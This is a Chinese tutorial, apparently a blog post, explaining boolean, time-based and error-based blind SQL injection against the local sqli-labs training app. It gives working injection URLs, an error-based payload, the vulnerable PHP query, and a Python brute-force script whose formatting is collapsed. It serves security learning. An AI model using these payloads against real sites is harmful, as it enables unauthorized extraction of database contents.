SQL盲注注入—

SQL盲注注入——布尔型

article/2025/9/13 16:37:57

盲注是注入的一种，指的是在不知道数据库返回值的情况下对数据中的内容进行猜测，实施SQL注入。盲注一般分为布尔盲注和基于时间的盲注和报错的盲注。本次主要讲解的是基于布尔的盲注。

Length（）函数 返回字符串的长度
Substr（）截取字符串
Ascii（）返回字符的ascii码
sleep(n)：将程序挂起一段时间 n为n秒
if(expr1,expr2,expr3):判断语句 如果第一个语句正确就执行第二个语句如果错误执行第三个语句

当然如果上面的函数被禁用，也有相应的函数替换。可百度

布尔型：页面只返回True和False两种类型页面。利用页面返回不同，逐个猜解数据

http://127.0.0.1/Less-8/?id=1'and (length(database()))>10 --+

当前数据库database（）的长度大于10，返回true页面，否则FALSE页面

报错型：构造payload让信息通过错误提示回显出来，一种类型（其它的暂时不怎么了解）是先报字段数，再利用后台数据库报错机制回显（跟一般的报错区别是，一般的报错注入是爆出字段数后，在此基础通过正确的查询语句，使结果回显到页面；后者是在爆出字段数的基础上使用能触发SQL报错机制的注入语句）

列如典型payload：

Select 1,count(*),concat(0x3a,0x3a,(select user()),0x3a,0x3a,floor(rand(0)*2))a from information_schema.columns group by a;

count(*)计数 concat()连接字符 floor()重复数据，返回0,1两个值 group by 进行分组 rand(0)避免数据重复造成的错误

时间型：通过页面沉睡时间判断

通过 sleep（）函数测试，通过if（）和sleep（）联合逐个猜解数据

http://127.0.0.1/Less-9/?id=1' and (if(ascii(substr(database(),1,1))>100,sleep(10),sleep(4))  --+

如果当前查询的当前数据库ascii(substr(database()),1,1)的第一个字符的ASCII码大于100，ture 沉睡10秒，FALSE 沉睡4秒

布尔型详解：

测试页面：

get一个参数 id =1,返回TRUE页面

注入测试加单引号id=1',返回不正确页面。

到这里初步确定单引号存在注入，TRUE页面有’you are in...........‘，FALSE页面不存在’you are in ........‘

源代码：
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";验证确实是由于单引号闭合导致注入漏洞。后台执行结果SELECT * FROM users WHERE id='1’' 原因单引号在闭合后还存在一个单引号。会引起查询报错

知道为盲注布尔型注入，利用上面的函数进行猜解

猜当前数据库第一个字符：(下面代码还需进行编码)

http://127.0.0.1/sqli-labs-master/Less-8/index.php?id=1'and ascii(substr(database(),1,1))>114#

利用二分法，115为fal，114TRUE，数据库第一个字符ASCII为115，即s

同理修改substr(database(),2,1)可猜第二个字符，之后同理，当然在猜数据库字符前也可先猜数据库长度：length（database()）

http://127.0.0.1/sqli-labs-master/Less-8/index.php?id=1' and ascii(substr(database(),1,1))>114# 这条语句在后台为：

SELECT * FROM users WHERE id='1' and ascii(substr(database(),1,1))>114#'（后面单引号被#注释掉）

后面的表，列，字段猜解在上篇有介绍查询语句

如表

http://127.0.0.1/Less-8/index.php?id=1' and (ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1)))>100#

其它就不一一写了。

接下来是自己写的Python脚本，爆破数据库长度和数据库

import requests
def database_len():for i in range(1,10):url = '''http://127.0.0.1/sqli-labs-master/Less-8/index.php'''payload = '''?id=1' and length(database())>%s''' %i# print(url+payload+'%23')r = requests.get(url+payload+'%23')if 'You are in' in r.text:print(i)else:#print('false')print('database_length:',i)break
database_len()def database_name():name = ''for j in range(1,9):for i in 'sqcwertyuioplkjhgfdazxvbnm':url = "http://127.0.0.1/sqli-labs-master/Less-8/index.php?id=1' and substr(database(),%d,1)='%s'" %(j,i)# print(url+'%23')r = requests.get(url+'%23')if 'You are in' in r.text:name = name+iprint(name)breakprint('database_name:',name)database_name()